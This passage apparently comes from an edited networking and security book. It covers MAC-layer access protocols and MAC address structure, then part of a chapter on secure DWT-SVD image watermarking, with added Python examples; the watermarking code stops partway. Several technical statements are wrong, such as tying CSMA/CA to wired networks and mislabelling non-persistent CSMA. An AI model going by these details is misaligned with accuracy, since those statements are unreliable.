focus more on enhancing overall performance, in terms of both effective
resource utilization and delay. In addition, appropriate traffic models
with precise battery lifetime need to be worked out for upcoming
applications. Methods for improving overall performance have to provide for
all the possibilities, such as analytical modeling, system-level
simulations, and hybrid techniques. Besides this, the most critical
applications are to be examined for lower power consumption, including the
operation of battery-driven devices in scenarios where there is either no
power supply or only a limited direct power supply, which can help power
management in M2M communication networks.

Future scope: The spectrum of cellular networks continues to be a scarce
resource; consequently there is an urge to map out new ideas for new
traffic types so as to use the bandwidth efficiently. Finally, for
efficient, optimized and reliable communication, all the above-stated
challenges need to be worked upon, including the challenges for all the end
users, right from regulatory organizations, vendors of network equipment
and consumer devices, and network operators, to the application providers.


Abstract

Media access control (MAC) is one of the sub-layers of the data link layer
(Layer 2) in the OSI (open systems interconnection) model. The MAC layer
provides a unique id and controls the channel access mechanism in order to
interface with other nodes over a shared channel by using a MAC protocol.
The MAC address is very helpful for delivering a data packet over an
electronic network, which is not possible in the case of postal addresses.
Data encapsulation, including frame assembly before transmission, and frame
parsing/error detection during and after reception are the two main duties
of the MAC.


Keywords: MAC layer, protocols, deterministic access, channelization, OSI
model


2.1 Introduction 


The Open Systems Interconnection Model (OSI Model) is a theoret- 
ical framework for describing the functions of a networking system. 
The connections between computing systems are classified into seven 
abstraction levels in the OSI reference model: Physical, Data Link, 
Network, Transport, Session, Presentation, and Application. The data 
link layer is divided into two sub-layers: Media access control (MAC) 
and Logical link control (LLC). MAC provides flow control and multiplexing
for device transmissions over a network. LLC provides flow and error
control over the physical medium and identifies line protocols.


2.2 MAC Layer 


Medium access control (MAC) is a sub-layer of the data link layer presented
in the OSI model. The MAC layer controls which devices can access the
shared network [1]. To ensure that all devices can access the network
within a period, some level of control is required, resulting in acceptable
access and response times. It can be characterized in different ways, which
are described below.


2.2.1 Centralized Control 


A centralized controller polls devices to find out when each station 
is allowed to access and transmit data. Stations transmit when they are 
asked to or when a request for station broadcasting is acknowledged and 
approved. Polling necessitates the transmission of control packets, which 
adds overhead and reduces throughput in comparison to the raw band- 
width available. 


2.2.2 Deterministic Access 


In the deterministic access method, each station has the assurance of being 
able to communicate within a certain time frame. Deterministic access is 
also known as non-contentious, because the devices do not contend for 
access; rather access is controlled on a centralized basis. 


2.2.3 Non-Deterministic Access


Non-deterministic media access control places access control
responsibilities on the individual stations. This is commonly known as
Carrier Sense Multiple Access (CSMA). It is a decentralized method, used in
Ethernet and other bus-oriented LANs, in which a station senses the medium
before accessing it to send data [2]. It is of two types: CSMA/CD and
CSMA/CA. In CSMA each station checks if there is any collision in the
shared medium.


2.3 Functions of the MAC Layer


The MAC layer provides the shared link addresses: every device has a unique
48-bit (6-byte) id known as the “MAC address”. The first three bytes
identify the manufacturer of the network equipment. As a result, any
network adapter (WLAN, Ethernet, or other) has a MAC address that is
supposed to be unique. A device can be reached by sending packets on the
network addressed to its MAC address [3].

The MAC address is defined in the same way in other IEEE-specified
protocols, such as Ethernet or Token Ring. This permits stations on various
types of networks to communicate with one another: all that is required is
the use of “bridges” to connect the different networks. MAC also initiates
frame transmission and recovery from transmission failure.


2.4 MAC Layer Protocol 


MAC layer protocols operate at Layer 2, the data link layer, as shown in
Figure 2.1; its sub-layers are shown in Figure 2.2. When multiple stations
want to transmit data at the same time on a shared link, such as a bus
topology, there is a chance of collision, which can lead to wastage of data
[4]. Therefore, different types of MAC protocols are required to reduce
collisions [5].


Layer 7  Application
Layer 6  Presentation
Layer 5  Session
Layer 4  Transport
Layer 3  Network
Layer 2  Data Link (LLC, MAC)
Layer 1  Physical


Figure 2.1 OSI model representing MAC layer.


LLC 802.2
MAC 802.11 (Wi-Fi) | MAC 802.3 (Ethernet)


Figure 2.2 Sub-layer of data link layer.


MAC layer protocols are classified as follows (shown in Figure 2.3):


MAC Layer Protocols
  Random Access Protocols: ALOHA, CSMA, CSMA/CD, CSMA/CA
  Controlled Access Protocols: Reservation, Polling, Token Passing
  Channelization Protocols: FDMA, TDMA, CDMA


Figure 2.3 Classification of MAC layer protocols.


2.4.1 Random Access Protocol 


In this kind of protocol all stations have the same priority [6]. Depending
on the status of the medium, any station can transfer data over the shared
link whenever it is ready. It has two features:


• Stations can send data at any time, without fixed timing.
• There is no set order in which stations deliver data.


It is further classified as: 


(a) ALOHA:

This protocol is based on LAN, but it can also be used for shared media.
Multiple stations might broadcast data at the same time, which might result
in collisions and jumbled data.

- Pure Aloha:

In pure aloha, any station can transmit data at any time. If data is
transmitted from one station to another without any collision, an
acknowledgement (ack) is sent. If the ack is not received within a given
time, the station waits for a certain time, say Tb, before resending the
data. Because different stations wait for varying amounts of time, the
chances of another collision are reduced, as shown in Figure 2.4.

Figure 2.4 Pure Aloha.

- Slotted Aloha:

In slotted aloha, unlike pure aloha, time is split into slots and a
transmission can only begin at the start of a slot; otherwise the station
has to wait for the next available slot. This lowers the chances of
interference, as shown in Figure 2.5.

[Figure 2.5: stations 1 to 6 on a time axis (shaded slots indicate
collisions), marking the reference packet and the vulnerable periods for
slotted ALOHA and pure ALOHA.]

Figure 2.5 Slotted Aloha.

(b) CSMA - In CSMA each station first senses whether the shared channel is
busy and transmits the data accordingly. This reduces collisions to a large
extent. The station transfers data if the channel is idle; otherwise, it
waits for the channel to become idle. However, because of the propagation
delay, there is still a probability of a collision in CSMA.

CSMA access modes -

1-persistent: In this method, the node continuously senses the medium to
check whether it is busy. If it senses that the medium is not busy, it
transmits the data. The worst case occurs when several stations sense the
medium at the same time and find it not busy: each node transmits
immediately and the chances of collision are severe.

P-persistent: In this method the node does not send the data immediately
when the shared medium is idle; it transmits with probability p, which has
a value between 0 and 1. It becomes 0-persistent at p equal to 0 and
1-persistent at p equal to 1. Wi-Fi and packet radio technologies both use
it.

O-persistent: The priority of nodes is determined ahead of time, and
transmission takes place in that order. In this method the node waits for
some random time if the medium is busy, and after that time it senses the
medium again. Collisions are fewer compared to 1-persistent.

(c) CSMA/CD (collision detection) - The CSMA technique does not specify
what should be done in the event of a collision. To deal with collisions,
the carrier sense multiple access with collision detection (CSMA/CD) method
is added to the CSMA algorithm. The size of a frame in CSMA/CD must be
large enough for the sender to identify a collision while sending the frame
[7].

Assume that a station successfully sent data packets to their destination;
this is only the best-case scenario, so we must also consider the worst
case, in which there will be contention slots, as shown in Figure 2.6.
Contention slots are those in which, due to a collision, stations are
unable to transmit their traffic.

[Figure 2.6: timing diagram for station A, labelled Tp, Tt and 2Tp.]

Figure 2.6 Assume A station communicated data but collided, wasting 2Tp in
the worst-case scenario, and then some station B discovered a way to
transfer the data, which took.

(d) CSMA/CA (collision avoidance) - The sender receives acknowledgement
signals as part of the collision detection procedure. The data is
successfully delivered if there is just one signal (its own) and collision
will happen for two signals. In wired networks, however, this is not the
case; hence CSMA/CA is employed.

CSMA/CA avoids collision by:

Inter-frame space - The station checks whether the shared medium is busy,
and if it is free, it does not broadcast data right away, in order to
reduce collisions. It waits for a period of time known as the inter-frame
space (IFS). After that, it checks whether the medium is still idle. The
length of the IFS is determined by the station's priority.

Contention window - This is an amount of time divided into equal slots.
When the transmitter is ready to transfer data, it selects a random number
of slots as its hold time. If the medium becomes busy, the procedure is not
restarted in its entirety; rather, the timer is restarted when the medium
becomes free again.

Acknowledgement - If the sender does not receive an acknowledgement before
the timer expires, the data is resent.
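
The difference between pure and slotted ALOHA in item (a) above can be checked on one fixed set of frame arrivals. The following Python sketch is an added example, not part of the original chapter; the arrival times, the unit frame time and the function names are constructed for illustration, and the throughput formula is the standard Poisson-traffic result rather than something stated in the text.

```python
"""Pure vs. slotted ALOHA on one constructed set of frame arrivals."""
from math import ceil, exp

FRAME_TIME = 1.0  # assumption: every frame occupies the channel for one time unit

# Constructed sample: station id -> time at which its frame becomes ready.
ARRIVALS = {1: 0.2, 2: 0.9, 3: 1.3, 4: 3.0, 5: 4.6, 6: 5.2}


def pure_aloha_delivered(arrivals, frame_time=FRAME_TIME):
    """Stations whose frame survives when everyone transmits immediately.

    A frame starting at t overlaps any frame that starts in the open interval
    (t - frame_time, t + frame_time): a vulnerable period of two frame times.
    """
    delivered = []
    for station, start in arrivals.items():
        clash = any(
            peer != station and abs(start - other) < frame_time
            for peer, other in arrivals.items()
        )
        if not clash:
            delivered.append(station)
    return sorted(delivered)


def slotted_aloha_delivered(arrivals, frame_time=FRAME_TIME):
    """Stations whose frame survives when sending is deferred to a slot start.

    Frames collide only if they were deferred to the same slot, so the
    vulnerable period shrinks to one frame time.
    """
    slot_of = {s: ceil(t / frame_time) for s, t in arrivals.items()}
    occupancy = {}
    for slot in slot_of.values():
        occupancy[slot] = occupancy.get(slot, 0) + 1
    return sorted(s for s, slot in slot_of.items() if occupancy[slot] == 1)


def throughput(offered_load, vulnerable_frames):
    """Expected successful frames per frame time for Poisson offered load G.

    S = G * exp(-k * G), with k = 2 for pure and k = 1 for slotted ALOHA.
    """
    return offered_load * exp(-vulnerable_frames * offered_load)


if __name__ == "__main__":
    print("pure   :", pure_aloha_delivered(ARRIVALS))
    print("slotted:", slotted_aloha_delivered(ARRIVALS))
    print("peak pure   :", round(throughput(0.5, 2), 4))
    print("peak slotted:", round(throughput(1.0, 1), 4))
```

Every frame that survives under pure ALOHA also survives under slotted ALOHA for the same arrivals, because two frames deferred to the same slot always started less than one frame time apart.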


2.4.2 Controlled Access Protocols 


In this method, the stations exchange data to establish which station has
the authority to send. To avoid interference over the shared link, only one
station is allowed to send at a time.

The three methods of these protocols are as follows:


Reservation
Polling
Token Passing


(a) Reservation - A station must use the reservation mechanism to make a
reservation before transferring data.

The reservation period is divided into N slots if there are N stations, and
one slot is assigned to each station. While station 1 transmits its data,
the other stations are restricted from taking action. In general, by
putting a 1 bit into the ith slot, the ith station can advertise that it
has a frame to deliver. Once all N slots have been examined, each station
knows which stations want to transmit.

The next reservation interval begins when the transmission of data has
ended. This reduces the chances of collision, as everyone knows who will be
next. This concept is illustrated in Figure 2.7.

Figure 2.7 Five stations and slot reservation frame.

(b) Polling - The polling procedure is analogous to a roll call in class. A
controller, like the instructor, sends a message to each station in turn.
One station serves as the primary station (controller), while the others
serve as subsidiary stations. All data exchanges must go through the
controller. The message sent by the controller includes the address of the
node being selected for access.

Although all nodes receive the message, only the one to which it is
addressed responds and provides data. A “poll reject” (NAK) message is
usually returned if there is no data. The polling messages have a large
overhead, and the scheme depends heavily on the controller's reliability,
as explained in Figure 2.8.

[Figure 2.8: a primary station and secondary stations; labels Poll and
Select.]

Figure 2.8 Polling process.

(c) Token passing - In this method, stations are linked with each other in
the form of a ring and managed by tokens, as shown in Figure 2.9. A token
consists of a particular pattern and is passed from one station to another
in a fixed order. In Token bus, each station uses the bus to deliver the
token to the next station in a predetermined order.

In all cases the token denotes permission to send. When a station receives
the token and has a frame waiting to be transmitted, it may send the frame
before passing the token to the next station. If there is no waiting frame,
it just passes the token. After transmitting a frame, each station must
wait for all P stations to pass the token to their neighbours, and for the
other P - 1 stations to send a frame if they have one. There are problems
with token duplication or loss, as well as with the insertion and removal
of stations, which must be solved for this scheme to function correctly and
reliably.


2.4.3 Channelization 


Channelization is categorized in terms of frequency, time and code. They 
are explained as follows: 


(a) Frequency Division Multiple Access (FDMA) - It provides 
chunks of frequency spectrum to each user for data transmis- 
sion. Generally the data is transmitted at baseband and modu- 
lated at varying radio frequencies. 

(b) Time Division Multiple Access (TDMA) - It allows multiple 
users to share a common frequency band by allocating different 
time slots. It is used in GPRS, GSM, etc. [8]. 

(c) Code Division Multiple Access (CDMA) - All transmissions are carried on
a single channel at the same time. There is no division of bandwidth or
time. Data from many stations can be delivered at the same time in several
coding patterns.


2.5 MAC Address 


The physical address that uniquely identifies each device on a network is
known as the MAC address, shown in Figure 2.10. We need two addresses to
communicate between two networked devices: an IP address and a MAC address.
The MAC address is assigned to the NIC (Network Interface Card) of each
device that may connect to the internet [9].

[Figure 2.9: token passes around the ring from station to station.]

Figure 2.9 Token passing process.

6 octets: 1st octet | 2nd octet | 3rd octet | 4th octet | 5th octet | 6th octet
First 3 octets: Organisationally Unique Identifier (OUI)
Last 3 octets: Network Interface Controller (NIC) Specific
Flag bit: 0: unicast, 1: multicast
Flag bit: 0: globally unique (OUI enforced), 1: locally administered

Figure 2.10 48-bit MAC address structure.

The MAC (Media Access Control) address is also known as the physical
address, hardware address, or BIA (burned-in address). It is globally
unique, which implies that no two devices can have the same MAC address. It
is expressed in hexadecimal format on each device, such as
22:0B:42:8C:12:72. It is provided by the device's manufacturer at the time
of manufacture and is built into the device's NIC, and ideally it cannot be
modified. It is 12 hexadecimal digits (48 bits) long, with the first 24
bits used for the OUI (Organization Unique Identifier) and the remaining 24
bits for NIC/vendor-specific information [10].
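
The address layout described in this section (24-bit OUI, 24-bit NIC part, and the unicast/multicast and globally unique/locally administered flags of Figure 2.10) can be decoded directly. The following Python sketch is an added example, not part of the original chapter; the function names and every sample address except 22:0B:42:8C:12:72 are constructed, and it relies on the IEEE 802 convention that the two flags are the two least significant bits of the first octet.

```python
"""Decode a 48-bit MAC address into OUI, NIC part and its two flag bits."""
import re

# Accepted spellings (assumption: the common ones found in logs and inventories).
FORMATS = (
    re.compile(r"[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}"),   # 22:0B:42:8C:12:72
    re.compile(r"[0-9A-Fa-f]{2}(-[0-9A-Fa-f]{2}){5}"),   # 22-0B-42-8C-12-72
    re.compile(r"[0-9A-Fa-f]{4}(\.[0-9A-Fa-f]{4}){2}"),  # 220b.428c.1272
    re.compile(r"[0-9A-Fa-f]{12}"),                      # 220B428C1272
)


def _fmt(octets):
    """Render octets in the colon-separated upper-case form used in the text."""
    return ":".join(f"{b:02X}" for b in octets)


def parse_mac(text):
    """Return the normalized address, its OUI and NIC halves, and both flags.

    Raises ValueError for anything that is not exactly six octets in one of
    the accepted spellings (mixed separators are rejected).
    """
    text = text.strip()
    if not any(pattern.fullmatch(text) for pattern in FORMATS):
        raise ValueError(f"not a 48-bit MAC address: {text!r}")
    octets = bytes.fromhex(re.sub(r"[:.-]", "", text))
    first = octets[0]
    return {
        "address": _fmt(octets),
        "oui": _fmt(octets[:3]),                     # first 24 bits
        "nic": _fmt(octets[3:]),                     # remaining 24 bits
        "multicast": bool(first & 0x01),             # 0: unicast, 1: multicast
        "locally_administered": bool(first & 0x02),  # 0: globally unique
    }


def classify_source(text):
    """Label a MAC address observed as the *source* of a frame.

    A group address is never a valid source, and a locally administered
    address carries no manufacturer OUI (it was set in software).
    """
    try:
        mac = parse_mac(text)
    except ValueError:
        return "malformed"
    if mac["multicast"]:
        return "group-address-as-source"
    if mac["locally_administered"]:
        return "locally-administered"
    return "globally-unique"


SAMPLES = [
    "22:0B:42:8C:12:72",  # the address quoted in this section
    "00-1A-2B-3C-4D-5E",  # constructed
    "0100.5e00.00fb",     # constructed group address
    "22:0B:42:8C:12",     # constructed, one octet short
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample:20} {classify_source(sample)}")
```

Run on the section's sample address 22:0B:42:8C:12:72, the parser reports the locally administered flag as set, so its first three octets are not a manufacturer-assigned OUI.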


2.6 Conclusion and Future Scope 


In this chapter many MAC protocols have been explained. If we want to
improve performance, many other protocols are also feasible [11].
Interaction with the MAC layer can provide congestion management
information to other layers as well as improve routing decisions. However,
improving the MAC protocol can enhance communication reliability and energy
efficiency dramatically. The field of wireless sensor network (WSN) MAC
protocols has received a lot of attention from the scientific community
[12]. WSN MAC protocol classification is introduced with the goal of
improving performance, which can be a topic of future research. At the end,
open research questions are suggested.

Future work should concentrate on reducing delay, assuring service quality,
reducing interference and, finally, optimising power consumption: a set of
needs common to wireless sensor networks [13].


Abstract

The security of the watermark against unauthorized detection is a major
point of concern. If an illicit user can detect the watermark in the
watermarked image, then he can very easily remove that watermark, making
the image copyright-free, or he may remove the originally embedded
watermark and insert his own watermark. Either way, the illicit user can
diminish the original owner's copyright over the image. This leads to the
requirement for methods that can provide security against unauthorized
detection of the watermark. To solve this problem, a highly secure
grayscale image watermarking algorithm that uses the DWT-SVD approach has
been proposed. In this work, a balance between robustness and
imperceptibility has also been retained. It is apparent that the proposed
algorithm provides improved robustness and imperceptibility, and that the
method provides security to the watermark as well.


3.1 Introduction


In the past few decades, the popularity of internet technology has increased 
enormously. It has led to easiness in communication and dissemination of 
digital documents such as image, video, text, and audio. However, the very 
conveniently available image processing tools make it even easier to dupli- 
cate, modify, and redistribute such multimedia data. These acts of copying, 
modifying and redistribution of digital data violate the intellectual prop- 
erty rights of the multimedia data owner. Hence, copyright protection of 
digital data has emerged as a potential area of research in the current sce- 
nario [1-4]. To address the issues related to copyright protection of multi- 
media data, a large number of data security techniques are proposed in the 
literature, and these are illustrated in Figure 3.1. Digital watermarking has 
evolved as a very effective information security technique for copyright 
protection or copyright authentication. Broadly, these approaches can 
be characterized as the Cryptography approach and Information Hiding 
approach [5]. In cryptographic methods, the message is changed to a highly protected format which can be decrypted and recovered by certified users only. But the disadvantage of this technique is that after decoding of the message, it doesn't remain secure. Also, the procedure involved in cryptography is more complex than information hiding. Watermarking and Steganography techniques for information hiding are less complex and secure than cryptography techniques.

Figure 3.1 Classification of information hiding methods. (Tree diagram: Information Security Method divides into Cryptography and Information Hiding; Information Hiding divides into Watermarking and Steganography; Watermarking is classified by Document, Working Domain, Human Perception and Reversibility, with Robust and Fragile among the leaf classes.)

In Steganography, the expected recipient can only recognize the presence of hidden information. However, most users can't even detect the presence of a message, which hinders its use in multimedia-based applications. In steganography, the message and watermark need to be uncorrelated to each other. However, in watermarking-based encryption techniques the message and watermark may or may not be correlated to each other.

The watermark embedding approach used in the steganography and watermarking methods makes the two techniques different. In the watermarking technique, the embedded watermark may be visible or not, but in the steganography technique the watermark is always invisible. Figure 3.2 highlights the main features of three techniques - steganography, cryptography and watermarking. Among these three, watermarking is the most widely used in multimedia-based applications, for copyright protection or copyright authentication.

Imperceptibility and robustness are the two key parameters that decide 
the performance of the digital watermarking algorithm. A trade-off between 
the two parameters needs to be maintained as these are interrelated. There 
are numerous approaches proposed in the literature that address this issue. 
However, there is no unique digital watermarking method available that 
provides security against all possible threats to multimedia data [6, 7]. 


Information Hiding Methods

Steganography
• It is a method to modify text or other form of information by transforming the source to a target file.
• One to one communication.
• Invisible.
• Hides the message.
• Mainly concerned with detection of the hidden message.

Cryptography
• It is a method to hide information.
• The encrypted message is visible to all, so it is one to many communication.
• Change the data so it is not readable.
• Once decrypted, data can be easily redistributed.
• Try to protect the content of a message.

Watermarking
• It is a method to embed an identifier in some hidden way in a file (text, audio, video, image etc.).
• One to many communication.
• Watermarking concerns potential removal by a pirate.
• We can design both fragile or robust watermarking systems as per the application requirements.
• Visible/Invisible.
• Its goal is authentication/protection of the copyright of source data.

Figure 3.2 Difference between steganography, cryptography, and digital watermarking.
3.2 Literature Review


A watermark can be embedded in an image either in the spatial domain or in the transform domain. In spatial domain watermarking the pixel values of the host image are altered directly; its only advantage is that it is very simple to implement and provides high data capacity. In this technique, security can be enhanced by embedding a watermark multiple times, which helps the watermark survive attacks. However, spatial domain techniques of watermarking suffer from image processing attacks like compression, rotation, etc. [1, 14].

Another way of embedding a watermark is transform domain. In this 
technique, host image and watermarked image are transformed in fre- 
quency domain, followed by embedding watermark coefficients in the 
host image keeping in view the human visual system (HVS). Transform 
domain techniques have shown better robustness and imperceptibility 
compared to spatial domain techniques [8-10]. 

Various transformation techniques like Discrete Fourier Transform 
(DFT) [10], Discrete Cosine Transform (DCT) [11], Discrete Wavelet 
Transform (DWT) [12, 13], fractional Fourier Transform (FrFT) [14], 
Discrete fractional Cosine transform (DFrCT) [15], some linear algebra 
transform methods such as singular value decomposition (SVD) [16], and 
QR decomposition [17], are executed to accomplish improved impercepti- 
bility and robustness in digital watermarking [18-24]. 

I.J. Cox (1997) [1] has given a DCT-based non-blind digital watermark- 
ing algorithm. C.T. Hsu et al. (1998) [25] suggested a multi-resolution 
watermarking algorithm that uses sub-band DWT coefficients of the host 
image and watermark images. The algorithm showed good robustness and 
imperceptibility for common image processing attacks but suffered with 
geometric attacks. 

C.T. Hsu et al. (1999) [16] proposed an algorithm in which the middle- 
frequency DCT coefficients are explored for embedding the watermark 
without affecting the low-frequency coefficients. 

Wen-Nung Lie et al. (2000) [26] proposed a robust algorithm that gives better performance for different geometric and non-geometric attacks by calculating the DCT coefficients and inserting the watermark coefficients in its middle band; the host image is also not required during the extraction of the watermark. When compared with [27] it showed that the algorithm is computationally expensive and couldn't sustain cropping attacks.

M. Barni et al. (2001) [28] developed an algorithm that is based on a pixel-wise masking model which uses HVS properties to improve watermark indistinctness and robustness. Pixel by pixel masking is performed to compute the local brightness and texture; however, this information alone is not sufficient for brightness or texture calculation.

W.C. Chu (2003) [18] proposed a subsampling technique that used random perturbation of DCT coefficients that belong to various sub-images. It's a blind watermarking algorithm. The algorithm shows good performance and better robustness against re-watermarking, collusion attacks, noise addition and high pass filtering; however, it suffers under compression attacks.

S.U. Liyun et al. (2006) [29] proposed a Fuzzy c-means-based adaptive image watermarking algorithm for classifying image blocks into two categories. To fine-tune the power of the watermark, a frequency masking technique is used. The algorithm showed good performance against various image processing attacks.

V.S. Verma (2013) [30, 31] has suggested an algorithm in which the difference between LWT coefficients is taken. Then random scrambling of CH3 sub-block sub-bands is done, followed by insertion of the watermark into the obtained largest coefficients. This algorithm showed good robustness for different geometric and non-geometric attacks and also better visible quality in comparison to algorithms using the same methodology [32-35].

Singh et al. (2014) [36] proposed a new multi-transform-based robust watermarking scheme. The host image is transformed by applying DWT and the HH sub-band is obtained, followed by DCT and then SVD to obtain the watermarked image. This algorithm used multiple transformations on the host image, making it complex. Ahmad et al. (2014) [37] proposed a three-level 2D DWT watermarking algorithm in which the LL sub-band coefficients obtained by applying DWT to the watermark image and the host image are used in the watermark embedding process. The algorithms performed well against various geometric attacks at the cost of increased complexity.

Rahman and Rabbi (2015) [38] proposed a watermarking algorithm for 
colored images that used DWT and SVD. Vaidya and Mouli (2015) [39] 
presented an adaptive watermarking algorithm that explored B&K meth- 
ods to estimate the scaling factor. Simulation results showed the superior- 
ity of the proposed algorithm compared to similar algorithms in [40, 41]. 

Jamal et al. (2016) [42] proposed a substitution box-based semi-fragile 
watermarking technique. DFT has been used to decompose the host image 
and a chaotic map is used to embed the watermark. 

A histogram-based robust image watermarking algorithm has been pro- 
posed in [43, 44]. The feature points from the color image are extracted 
using the probability density-based features. Algorithm showed better per- 
formance when compared with other similar algorithms in [45-48]. 
Lei et al. (2017) [49] proposed a robust watermarking technique that
combines multiple watermarks while embedding. Singh et al. (2017) 
[51] pooled different transformation methods - Contourlet Transform, 
Redundant DWT and SVD to embed the watermark and showed better 
robustness and imperceptibility compared to other similar methods like 
[50, 52, 53]. 

Amini (2017) designed a blind watermark decoder by using HMM [54]. 
Substantial improvements in robustness have been shown compared to 
similar techniques offered in literature [55, 56]. Issue of FPP of SVD has 
been addressed by Makbol et al. (2018) [57] and he considered existing 
DWT-SVD and RDWT-SVD algorithms but with FPP. 

Zhou et al. (2018) [58] proposed DWT, DCT and DFRNT based water- 
marking algorithm which is extremely secure. A DWT and encryption 
based watermarking algorithm for copyright protection of images has 
been proposed by Ambadekar et al. (2018) [59]. Recently, Artificial Neural 
Network and Machine learning based algorithms [60-66] have been sug- 
gested to improve the performance of conventional watermarking algo- 
rithms. The grouping of watermarking techniques, metrics for analyzing 
the performance of the digital images has also been presented. 


3.3 Design Issues


There are certain design issues [11] in Digital watermarking systems such 
as robustness against various attack situations, distortion and visual qual- 
ity, working domain, Human Visual System (HVS), a balance between 
imperceptibility, robustness, computational cost, etc. These issues are dis- 
cussed in detail below. 


3.3.1 Robustness Against Various Attack Conditions 


The attackers in a digital watermarking system can be classified as passive attackers and active attackers. The passive attacker doesn't harm the watermarked image directly; instead, he just detects the presence or absence of the watermark. However, the active attacker will extract the watermark and will try to alter or destroy the watermark. So, the active attacker can alter the copyright over the watermarked image. In actual scenarios, the transmitted watermarked image travels through wired or wireless channels, and in this course, it faces several image processing or geometric attacks [10]. Figure 3.3 shows the possible cracking of the watermarking system by passive and active attackers. It has been observed that most of the available watermarking methods are resistant to compression, filtering, and some other conventional image processing attacks but they lag in providing enough robustness against geometric attacks.

Figure 3.3 Breaking watermarking system by possible attackers.

Hence, it becomes an important issue to design a watermarking system 
that can provide robustness against geometric attacks as well. Along with 
robustness, it is also very important to make the watermark secure against 
unauthorized detection and hence alteration. 


3.3.2 Distortion and Visual Quality 


The visual quality of the host image is directly affected upon insertion of 
the watermark. The distortions introduced during the watermark inser- 
tion process and due to the intentional/unintentional attacks across the 
channel are generally asymmetric in nature, hence there is a wide range of 
Peak Signal to Noise Ratio (PSNR). It helps in evaluation of imperceptibil- 
ity offered by any watermarking scheme. Hence the imperceptibility of the 
watermarked image is proportional to the PSNR attained. 

3.3.3 Working Domain


The most significant bit (MSB) and least significant bit (LSB) are the two most widely adopted spatial domain watermarking methods. Figure 3.4 showcases a sample of the insertion of watermark bits over the host image, the generation of watermarked bits, and finally, the changes introduced and the extracted watermark bits using the LSB-based watermarking method in the spatial domain [67]. The major advantage of LSB-based watermarking schemes over MSB-based watermarking schemes is that LSB watermarking introduces less distortion as compared to MSB watermarking schemes. Spatial domain watermarking methods are computationally less expensive and easy to implement but these methods offer much less robustness against the imposed attacks, low imperceptibility, and less security to the watermark as compared to the transform domain watermarking methods. In transform domain methods, instead of modifying the pixels directly, the watermark is inserted on the transformed coefficients of the host image.

Figure 3.4 An example of LSB Spatial Domain Watermarking [69].


3.3.4 Human Visual System (HVS) 


The visual quality or the imperceptibility parameter in the digital image 
watermarking methods can be achieved by exploiting the features of the 
HVS while designing the watermarking system. It has been observed that 
the multi-resolution property of Discrete Wavelet Transform (DWT) 
makes it similar to HVS [68]. Hence, where imperceptibility is an important
parameter in a watermarking system, DWT is preferred.


3.3.5 The Trade-Off between Robustness and Imperceptibility 


It is desired that the designed watermarking system should be capable of providing high imperceptibility, robustness towards the attacks, high fidelity, and security [70, 71]. The watermarking system should be able to insert a maximum capacity watermark without severe deterioration in the imperceptibility of the host image, and removing the watermark from the host image shouldn't be easy. The fundamental issue in the design of a digital image watermarking system is to achieve a balance between imperceptibility and robustness because these parameters conflict with each other.


3.3.6 Computational Cost 


Computational cost or time complexity is another major aspect of digital 
image watermarking. The designed watermarking scheme should be able 
to execute efficiently by consuming minimum execution time. To maintain 
a balance between robustness and imperceptibility various available GA or 
optimization techniques can be used. But these optimization methods take 
much execution time, hence designing a computationally efficient digital 
watermarking method is a very important design issue [71]. 


3.4 A Secure Grayscale Image Watermarking Based on DWT-SVD


In this section, a grayscale image watermarking method using DWT-SVD is explained. While designing this watermarking method the design issues such as security of the watermark from any unauthorized detection, high robustness, and high imperceptibility are taken care of.


Watermark Insertion Process


Let an image I[x, y] be the original grayscale host image. The watermark image is a grayscale image of size M x N. The low frequencies of the host image are extracted by using 2 level RDWT and the SVD is applied over those low frequencies. The flowchart of the algorithm is depicted in Figure 3.5 and the steps involved in the implementation of this algorithm are discussed below.

The steps involved in the watermark insertion process:

1. Insert the encryption key.
2. 2 level DWT decomposition is applied over the original host image to extract all the four sub-bands LL, LH, HL, and HH.
3. SVD is applied over the LL sub-band to extract S, U, and V matrices from the LL sub-band of the host image.
4. Take the S matrix obtained in step 2 for the watermark insertion process.
5. 2 level DWT decomposition is applied over the original watermark image to extract LL, LH, HL, and HH sub-band.
6. SVD is applied over the LL sub-band to extract S, U, and V matrices from the LL sub-band of the watermark image.
7. Take the S matrix obtained in step 5 for the watermark insertion process.
8. Select the position in the S matrix of the host image.
9. Apply watermark insertion algorithm. The resultant image would be the watermarked image.
10. Apply image processing attacks over the watermarked image.

The steps involved in the watermark extraction process are as follows:

1. Check the encryption key. If the key matches go to step 2 of the extraction process, else flash the message "Not an authorized user".
2. Over the distorted watermarked image obtained from step 8, apply the watermark extraction process.
3. Retrieve the watermark from step 1 of the extraction process.
4. Compare the extracted watermark with the original watermark.
5. Calculate SSIM for the comparison of the step above. This comparison defines the robustness of this algorithm.

Figure 3.5 The flowchart of proposed algorithm.
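The insertion and extraction steps above, carried through end to end as an added example (not the chapter's MATLAB code). The chapter does not state the insertion rule, the scaling factor or the side information held by the extractor, so the additive rule S' = S + alpha * S_w, ALPHA = 0.05, the HMAC key tag, the stored host U/S/V and watermark U/V, the hand-written Haar transform and the synthetic test images are all assumptions of this sketch.

```python
import hashlib
import hmac
import numpy as np

ALPHA = 0.05  # embedding strength; assumed, the chapter gives no value

def haar2(a):
    """One level of the orthonormal 2-D Haar DWT: returns LL, LH, HL, HH."""
    p, q, r, s = a[0::2, 0::2], a[0::2, 1::2], a[1::2, 0::2], a[1::2, 1::2]
    return (p + q + r + s) / 2, (p + q - r - s) / 2, (p - q + r - s) / 2, (p - q - r + s) / 2

def ihaar2(ll, lh, hl, hh):
    """Inverse of haar2."""
    a = np.empty((2 * ll.shape[0], 2 * ll.shape[1]))
    a[0::2, 0::2] = (ll + lh + hl + hh) / 2
    a[0::2, 1::2] = (ll + lh - hl - hh) / 2
    a[1::2, 0::2] = (ll - lh + hl - hh) / 2
    a[1::2, 1::2] = (ll - lh - hl + hh) / 2
    return a

def dwt_level2(img):
    """2-level decomposition: level-2 LL band plus the detail bands of both levels."""
    ll1, *d1 = haar2(np.asarray(img, dtype=float))
    ll2, *d2 = haar2(ll1)
    return ll2, (d1, d2)

def idwt_level2(ll2, details):
    d1, d2 = details
    return ihaar2(ihaar2(ll2, *d2), *d1)

def key_tag(key):
    """Tag kept with the side information so a wrong key is rejected up front."""
    return hmac.new(key, b"dwt-svd-watermark", hashlib.sha256).digest()

def key_positions(key, n_host, n_wm):
    """Key-dependent choice of which host singular values carry the watermark."""
    seed = int.from_bytes(hashlib.sha256(key).digest()[:8], "big")
    return np.random.default_rng(seed).choice(n_host, size=n_wm, replace=False)

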